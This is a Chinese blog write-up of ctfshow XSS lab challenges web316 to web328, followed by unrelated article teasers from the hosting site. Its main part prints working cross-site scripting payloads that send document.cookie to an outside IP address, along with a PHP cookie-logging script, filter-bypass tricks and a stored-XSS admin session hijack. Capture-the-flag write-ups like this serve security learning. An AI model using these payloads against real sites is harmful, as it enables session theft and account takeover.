news 2026/4/15 13:11:45

ctfshow[ xss 篇]

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
ctfshow[ xss 篇]

web316

1.打开是一个这样的页面

可以写下祝福语,既然是xss题目,那么直接xss语句,看看能不能弹窗

<script>alert(1)</script>

发现可以,查看一下他的cookie

<script>alert(document.cookie)</script>

说我不是admin,没有flag

2.开始构造

方法1

可以通过服务器的方式进行外带

<script>location.href="ip"+document.cookie</script>

我这里使用的是python -m http.server 80,python的服务

<script>location.href="http://106.55.49.252/"+document.cookie</script>

然后到达服务器这里看响应

解码完得到flag

方法2

首先在服务器上写一个php文件

<?php $cookie = $_GET['cookie']; $time = date('Y-m-d h:i:s', time()); $log = fopen("cookie.txt", "a"); fwrite($log,$time.': '. $cookie . "\n"); fclose($log); ?>

然后访问这个php文件

<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie</script>

在传入这个,到服务器那里等15秒

3.知识点

这题使用的是一个外带的方法

location.href:获取或设置当前页面URL

题目中用到的

<script>location.href="http://106.55.49.252/"+document.cookie</script>

就相当于在管理员门口装了一个大镜子,当管理员admin,要拿钥匙开门的时候,把钥匙反射到我的屋里了

这个就是让admin的浏览器给服务器发送请求,顺便给我的服务器也发送了请求

web317

1.打开还是那个页面

这题过 滤了script,可以换一个属性

使用body属性

<body οnlοad="location.href='http://106.55.49.252/1.php?cookie'+document.cookie"></body>

然后到服务器查看

url解码得到flag

onload事件是页面加载完成触发

web318

1.上题的payload还能使用

还能使用svg属性

<svg οnlοad="location.href='http://106.55.49.252/1.php?cookie='+document.cookie"></svg>

web319

1.上题的payload还能使用

web320

1.这次上题的不行了

应该是多了过滤

一点一点的删除,看看是哪些过滤了

最后发现是空格被过滤了

绕过空格 ,有 / /**/ 绕过方式

考验对空格的绕过,可以使用 / /**/

一直到326题全部都是这个payload

web327

1.这题变成存储型了

有发件人,收件人 还有信的内容几个功能

那么根据前面题目的思路,这个收件人肯定是admin,然后信的内容就是xss的内容

2.开始构造

收件人admin,发件人任意,然后信的内容为下方的

<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie</script>

web328

1.打开变成了 登陆页面

登陆admin,弱口令发现不行,看到有个注册功能

不让注册admin

那就随便注册一个

登陆上去,发现用户管理,只有管理员可看,抓包看看,是如何验证身份的

发现是由cookie认证的,那么现在唯一能套取admin用户的cookie的地方,应该是由密码那里可以盗取

那么在注册的时候,将密码设置为盗取admin用户cookie的payload,然后再使用admin的来进行查看用户管理,那么不就成了

2.开始构造

任意注册一个用户,密码为盗取cookie的payload

这里需要加上分号因为前面那些题是纯HTML属性,所以不需要分号,现在这里是JS字符串内,必须加 分号,用来闭合前面的赋值语句并开启新语句

<script>location.href="http://106.55.49.252/1.php?cookie="+document.cookie;</script>

然后登陆完

给进行一个替换,这边就变成admin用户了

但是看不到管理页面,而且这是临时的,我们直接到存储里面修改 cookie,然后刷新一下就能看到flag了

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/10 15:34:50

Kimi K2本地部署技术解析:从架构理解到实践应用

Kimi K2本地部署技术解析&#xff1a;从架构理解到实践应用 【免费下载链接】Kimi-K2-Instruct-GGUF 项目地址: https://ai.gitcode.com/hf_mirrors/unsloth/Kimi-K2-Instruct-GGUF 在人工智能快速发展的当下&#xff0c;实现千亿参数大模型的本地部署已成为技术团队的…

作者头像 李华
网站建设 2026/4/14 0:17:57

终极CAD字库大全:275种SHX字体一键安装指南 [特殊字符]

终极CAD字库大全&#xff1a;275种SHX字体一键安装指南 &#x1f3af; 【免费下载链接】CAD常用字库275种字库 本仓库提供了一个包含275种常用CAD字库的资源文件&#xff0c;适用于AutoCAD和其他CAD软件。这些字库涵盖了多种字体类型&#xff0c;包括常规字体、复杂字体、手写字…

作者头像 李华
网站建设 2026/4/15 4:14:33

大明哥是 2014 年一个人拖着一个行李箱,单身杀入深圳,然后在深圳一干就是 10 年。10 年深漂,经历过 4 家公司,有 20+ 人的小公司,也有上万人的大厂。体验过所有苦逼深漂都体验过的1

大明哥是 2014 年一个人拖着一个行李箱&#xff0c;单身杀入深圳&#xff0c;然后在深圳一干就是 10 年。 10 年深漂&#xff0c;经历过 4 家公司&#xff0c;有 20 人的小公司&#xff0c;也有上万人的大厂。 体验过所有苦逼深漂都体验过的难。坐过能把人挤怀孕的 4 号线&am…

作者头像 李华
网站建设 2026/4/15 5:01:36

还在为模型部署发愁?Open-AutoGLM一键上云方案来了,99%的人都收藏了

第一章&#xff1a;Open-AutoGLM一键上云&#xff1a;开启高效模型部署新时代 随着大语言模型在企业级应用中的不断深入&#xff0c;如何快速、稳定地将训练完成的模型部署至云端成为开发者关注的核心问题。Open-AutoGLM 的出现&#xff0c;正是为了解决这一痛点&#xff0c;提…

作者头像 李华
网站建设 2026/4/15 1:20:23

Boop终极指南:快速共享游戏文件的免费工具

Boop终极指南&#xff1a;快速共享游戏文件的免费工具 【免费下载链接】Boop GUI for network install for switch and 3ds 项目地址: https://gitcode.com/gh_mirrors/boo/Boop Boop是一款专为任天堂游戏玩家设计的文件共享工具&#xff0c;通过直观的图形界面让Switch…

作者头像 李华
网站建设 2026/4/9 18:34:28

YOLO目标检测项目复现指南:包含完整GPU环境配置

YOLO目标检测项目复现与GPU环境配置实战 在智能制造、自动驾驶和智能监控等前沿领域&#xff0c;实时视觉感知能力正成为系统智能化的核心驱动力。然而&#xff0c;许多开发者在尝试部署目标检测模型时&#xff0c;常常卡在“明明代码跑通了&#xff0c;却无法在真实场景中稳定…

作者头像 李华